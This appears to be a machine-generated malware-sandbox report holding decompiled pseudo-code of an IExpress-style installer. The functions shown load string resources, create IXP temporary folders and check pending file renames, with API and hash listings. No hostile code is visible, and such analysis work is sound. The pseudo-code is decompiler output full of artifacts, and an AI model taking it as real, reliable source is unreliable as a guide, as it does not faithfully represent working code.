                                                                                                                                                                                                      			E00E744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0xe78a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe79a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E00E71680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E7171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E00E7171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E00E7681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E00E767C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(E00E7681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E00E767C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x00e744b9
                                                                                                                                                                                                      0x00e744c4
                                                                                                                                                                                                      0x00e744cb
                                                                                                                                                                                                      0x00e744d8
                                                                                                                                                                                                      0x00e744e4
                                                                                                                                                                                                      0x00e744eb
                                                                                                                                                                                                      0x00e744ee
                                                                                                                                                                                                      0x00e744ef
                                                                                                                                                                                                      0x00e744ef
                                                                                                                                                                                                      0x00e744f1
                                                                                                                                                                                                      0x00e744f7
                                                                                                                                                                                                      0x00e744f8
                                                                                                                                                                                                      0x00e7467b
                                                                                                                                                                                                      0x00e744fe
                                                                                                                                                                                                      0x00e74509
                                                                                                                                                                                                      0x00e74518
                                                                                                                                                                                                      0x00e74525
                                                                                                                                                                                                      0x00e74562
                                                                                                                                                                                                      0x00e74568
                                                                                                                                                                                                      0x00e74568
                                                                                                                                                                                                      0x00e7456b
                                                                                                                                                                                                      0x00e7456b
                                                                                                                                                                                                      0x00e7456d
                                                                                                                                                                                                      0x00e7456e
                                                                                                                                                                                                      0x00e74572
                                                                                                                                                                                                      0x00e74578
                                                                                                                                                                                                      0x00e7457c
                                                                                                                                                                                                      0x00e745cb
                                                                                                                                                                                                      0x00e74607
                                                                                                                                                                                                      0x00e74607
                                                                                                                                                                                                      0x00e7460d
                                                                                                                                                                                                      0x00e74613
                                                                                                                                                                                                      0x00e74617
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7461d
                                                                                                                                                                                                      0x00e74623
                                                                                                                                                                                                      0x00e74626
                                                                                                                                                                                                      0x00e74628
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74628
                                                                                                                                                                                                      0x00e745cd
                                                                                                                                                                                                      0x00e745cd
                                                                                                                                                                                                      0x00e745cf
                                                                                                                                                                                                      0x00e745cf
                                                                                                                                                                                                      0x00e745d2
                                                                                                                                                                                                      0x00e745d2
                                                                                                                                                                                                      0x00e745d4
                                                                                                                                                                                                      0x00e745d5
                                                                                                                                                                                                      0x00e745db
                                                                                                                                                                                                      0x00e745de
                                                                                                                                                                                                      0x00e745e3
                                                                                                                                                                                                      0x00e745e9
                                                                                                                                                                                                      0x00e745ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e745f3
                                                                                                                                                                                                      0x00e745fd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74602
                                                                                                                                                                                                      0x00e745ed
                                                                                                                                                                                                      0x00e7457e
                                                                                                                                                                                                      0x00e7457e
                                                                                                                                                                                                      0x00e74580
                                                                                                                                                                                                      0x00e74580
                                                                                                                                                                                                      0x00e74583
                                                                                                                                                                                                      0x00e74583
                                                                                                                                                                                                      0x00e74585
                                                                                                                                                                                                      0x00e74586
                                                                                                                                                                                                      0x00e7458a
                                                                                                                                                                                                      0x00e7458c
                                                                                                                                                                                                      0x00e7458f
                                                                                                                                                                                                      0x00e7458f
                                                                                                                                                                                                      0x00e74591
                                                                                                                                                                                                      0x00e74592
                                                                                                                                                                                                      0x00e7459b
                                                                                                                                                                                                      0x00e7459e
                                                                                                                                                                                                      0x00e745a3
                                                                                                                                                                                                      0x00e745a9
                                                                                                                                                                                                      0x00e745ad
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e745af
                                                                                                                                                                                                      0x00e745af
                                                                                                                                                                                                      0x00e745bf
                                                                                                                                                                                                      0x00e7462d
                                                                                                                                                                                                      0x00e74630
                                                                                                                                                                                                      0x00e7463d
                                                                                                                                                                                                      0x00e7464e
                                                                                                                                                                                                      0x00e7464e
                                                                                                                                                                                                      0x00e7463f
                                                                                                                                                                                                      0x00e74640
                                                                                                                                                                                                      0x00e74647
                                                                                                                                                                                                      0x00e7464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7464c
                                                                                                                                                                                                      0x00e74666
                                                                                                                                                                                                      0x00e7466d
                                                                                                                                                                                                      0x00e7466f
                                                                                                                                                                                                      0x00e74675
                                                                                                                                                                                                      0x00e74675
                                                                                                                                                                                                      0x00e745ad
                                                                                                                                                                                                      0x00e74527
                                                                                                                                                                                                      0x00e7452e
                                                                                                                                                                                                      0x00e7453f
                                                                                                                                                                                                      0x00e7453f
                                                                                                                                                                                                      0x00e74530
                                                                                                                                                                                                      0x00e74531
                                                                                                                                                                                                      0x00e74538
                                                                                                                                                                                                      0x00e7453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7453d
                                                                                                                                                                                                      0x00e74554
                                                                                                                                                                                                      0x00e7455a
                                                                                                                                                                                                      0x00e7455a
                                                                                                                                                                                                      0x00e7455a
                                                                                                                                                                                                      0x00e74525
                                                                                                                                                                                                      0x00e7468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E745A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00E745E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 00E7460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00E74630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00E74666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00E7466F
                                                                                                                                                                                                        • Part of subcall function 00E7681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E7686E
                                                                                                                                                                                                        • Part of subcall function 00E7681F: GetSystemMetrics.USER32(0000004A), ref: 00E768A7
                                                                                                                                                                                                        • Part of subcall function 00E7681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E768CC
                                                                                                                                                                                                        • Part of subcall function 00E7681F: RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,?,0000000C), ref: 00E768F4
                                                                                                                                                                                                        • Part of subcall function 00E7681F: RegCloseKey.ADVAPI32(?), ref: 00E76902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: 420a3164330606e9eabbb0fc3129ef5f3022e3deb2e4787239374e1bec210e6a
                                                                                                                                                                                                      • Instruction ID: 71285c30f93985824d31e5b2c3934c563dd6c0c3d4863dbafc521cb74ec23d73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 420a3164330606e9eabbb0fc3129ef5f3022e3deb2e4787239374e1bec210e6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D5116B2900215AFDB21DF68DC48BAA7BA9EF85304F1491A5FD0DB3281DB31DE49CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00E753A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00E7171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E00E71680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E00E7658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E00E76CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0xe78a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x00e753ac
                                                                                                                                                                                                      0x00e753b3
                                                                                                                                                                                                      0x00e753b9
                                                                                                                                                                                                      0x00e753bb
                                                                                                                                                                                                      0x00e753bd
                                                                                                                                                                                                      0x00e753bf
                                                                                                                                                                                                      0x00e753d1
                                                                                                                                                                                                      0x00e753d6
                                                                                                                                                                                                      0x00e753e0
                                                                                                                                                                                                      0x00e753e2
                                                                                                                                                                                                      0x00e753f5
                                                                                                                                                                                                      0x00e753fb
                                                                                                                                                                                                      0x00e75402
                                                                                                                                                                                                      0x00e7540b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75413
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75415
                                                                                                                                                                                                      0x00e75416
                                                                                                                                                                                                      0x00e75427
                                                                                                                                                                                                      0x00e7542a
                                                                                                                                                                                                      0x00e7542b
                                                                                                                                                                                                      0x00e75434
                                                                                                                                                                                                      0x00e75434
                                                                                                                                                                                                      0x00e7543a
                                                                                                                                                                                                      0x00e7544c
                                                                                                                                                                                                      0x00e7544c
                                                                                                                                                                                                      0x00e75452
                                                                                                                                                                                                      0x00e7545a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7545e
                                                                                                                                                                                                      0x00e7545f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7171E: _vsnprintf.MSVCRT ref: 00E71750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E753FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E7542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E75452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2659685179
                                                                                                                                                                                                      • Opcode ID: 2b9c534fe506e1ac0262299b7f927504bedf506ea18def6c08a3977cc16ac3d1
                                                                                                                                                                                                      • Instruction ID: b2f5b1c41bbf1712a97fe15f1a416dc2171b664b67b5954d0a729ed6434e8d39
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b9c534fe506e1ac0262299b7f927504bedf506ea18def6c08a3977cc16ac3d1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741104723006047BE720DB279C49FAF76ADEBC1315F049465F55EF2190DEB4898A86A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 563 e7256d-e7257d 564 e72583-e72589 563->564 565 e72622-e72627 call e724e0 563->565 566 e7258b 564->566 567 e725e8-e72607 RegOpenKeyExA 564->567 570 e72629-e7262f 565->570 569 e72591-e72595 566->569 566->570 571 e725e3-e725e6 567->571 572 e72609-e72620 RegQueryInfoKeyA 567->572 569->570 574 e7259b-e725ba RegOpenKeyExA 569->574 571->570 575 e725d1-e725dd RegCloseKey 572->575 574->571 576 e725bc-e725cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00E7256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E00E724E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00e72572
                                                                                                                                                                                                      0x00e72573
                                                                                                                                                                                                      0x00e72575
                                                                                                                                                                                                      0x00e72578
                                                                                                                                                                                                      0x00e7257d
                                                                                                                                                                                                      0x00e72627
                                                                                                                                                                                                      0x00e72583
                                                                                                                                                                                                      0x00e72586
                                                                                                                                                                                                      0x00e72589
                                                                                                                                                                                                      0x00e725eb
                                                                                                                                                                                                      0x00e72607
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72609
                                                                                                                                                                                                      0x00e7261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7258b
                                                                                                                                                                                                      0x00e7258b
                                                                                                                                                                                                      0x00e7259e
                                                                                                                                                                                                      0x00e725b2
                                                                                                                                                                                                      0x00e725ba
                                                                                                                                                                                                      0x00e725cb
                                                                                                                                                                                                      0x00e725d1
                                                                                                                                                                                                      0x00e725d6
                                                                                                                                                                                                      0x00e725da
                                                                                                                                                                                                      0x00e725dd
                                                                                                                                                                                                      0x00e725dd
                                                                                                                                                                                                      0x00e725e3
                                                                                                                                                                                                      0x00e725e3
                                                                                                                                                                                                      0x00e725e3
                                                                                                                                                                                                      0x00e7258b
                                                                                                                                                                                                      0x00e72589
                                                                                                                                                                                                      0x00e7262f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00E74096,00E74096,?,00E71ED3,00000001,00000000,?,?,00E74137,?), ref: 00E725B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00E74096,?,00E71ED3,00000001,00000000,?,?,00E74137,?,00E74096), ref: 00E725CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,00E71ED3,00000001,00000000,?,?,00E74137,?,00E74096), ref: 00E725DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00E74096,00E74096,?,00E71ED3,00000001,00000000,?,?,00E74137,?), ref: 00E725FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00E74096,00000000,00000000,00000000,00000000,?,00E71ED3,00000001,00000000), ref: 00E7261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00E725F5
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 00E725A8
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 00E725C3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
